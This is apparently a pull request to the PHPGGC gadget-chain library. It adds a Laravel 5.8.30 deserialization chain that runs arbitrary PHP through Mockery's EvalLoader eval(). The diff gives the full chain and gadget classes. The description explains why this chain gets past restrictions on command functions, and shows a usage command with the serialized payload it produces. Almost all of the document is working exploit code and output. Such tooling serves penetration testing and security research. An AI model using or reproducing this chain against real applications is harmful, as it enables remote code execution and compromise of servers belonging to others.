### PR TITLE
add laravel rce (until newest version) gadgetchain

### DIFF
--- a/gadgetchains/Laravel/RCE/5/chain.php
+++ b/gadgetchains/Laravel/RCE/5/chain.php
@@ -1,0 +1,20 @@
+<?php
+
+namespace GadgetChain\Laravel;
+
+class RCE5 extends \PHPGGC\GadgetChain\RCE
+{
+    public static $version = '5.8.30';
+    public static $vector = '__destruct';
+    public static $author = 'Phith0n';
+    public static $informations = 'Executes given php code througn eval()';
+    public static $parameters = [
+    	'code'
+    ];
+
+    public function generate(array $parameters)
+    {
+        $code = '<?php ' . $parameters['code'] . ' exit; ?>';
+        return new \Illuminate\Broadcasting\PendingBroadcast($code);
+    }
+}

--- a/gadgetchains/Laravel/RCE/5/gadgets.php
+++ b/gadgetchains/Laravel/RCE/5/gadgets.php
@@ -1,0 +1,55 @@
+<?php
+namespace Illuminate\Bus {
+    class Dispatcher {
+        protected $queueResolver;
+
+        function __construct()
+        {
+            $this->queueResolver = [new \Mockery\Loader\EvalLoader(), 'load'];
+        }
+    }
+}
+
+namespace Illuminate\Broadcasting {
+    class PendingBroadcast {
+        protected $events;
+        protected $event;
+
+        function __construct($evilCode)
+        {
+            $this->events = new \Illuminate\Bus\Dispatcher();
+            $this->event = new BroadcastEvent($evilCode);
+        }
+    }
+
+    class BroadcastEvent {
+        public $connection;
+
+        function __construct($evilCode)
+        {
+            $this->connection = new \Mockery\Generator\MockDefinition($evilCode);
+        }
+
+    }
+}
+
+namespace Mockery\Loader {
+    class EvalLoader {}
+}
+
+namespace Mockery\Generator {
+    class MockDefinition {
+        protected $config;
+        protected $code;
+
+        function __construct($evilCode)
+        {
+            $this->code = $evilCode;
+            $this->config = new MockConfiguration();
+        }
+    }
+
+    class MockConfiguration {
+        protected $name = 'abcdefg';
+    }
+}


### PR DESCRIPTION
The gadget chain is for Laravel, test on v5.8.30.

I checked other gadgets, it always needs to be passed in a function like `system`, `passthru`, `assert`, but:

- After PHP 7, `assert` is no longer a function, it can't be dynamic execute.
- On some virtual hosts, command functions may be denied.

Unlike other gadgets, this POC has no restrictions on PHP, just execute arbitrary PHP code through `eval()`.

Usage:

```
$ php phpggc laravel/rce5 -a 'phpinfo();'
O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{S:9:"\00*\00events";O:25:"Illuminate\Bus\Dispatcher":1:{S:16:"\00*\00queueResolver";a:2:{i:0;O:25:"Mockery\Loader\EvalLoader":0:{}i:1;S:4:"load";}}S:8:"\00*\00event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{S:10:"connection";O:32:"Mockery\Generator\MockDefinition":2:{S:9:"\00*\00config";O:35:"Mockery\Generator\MockConfiguration":1:{S:7:"\00*\00name";S:7:"abcdefg";}S:7:"\00*\00code";S:25:"<?php phpinfo(); exit; ?>";}}}
```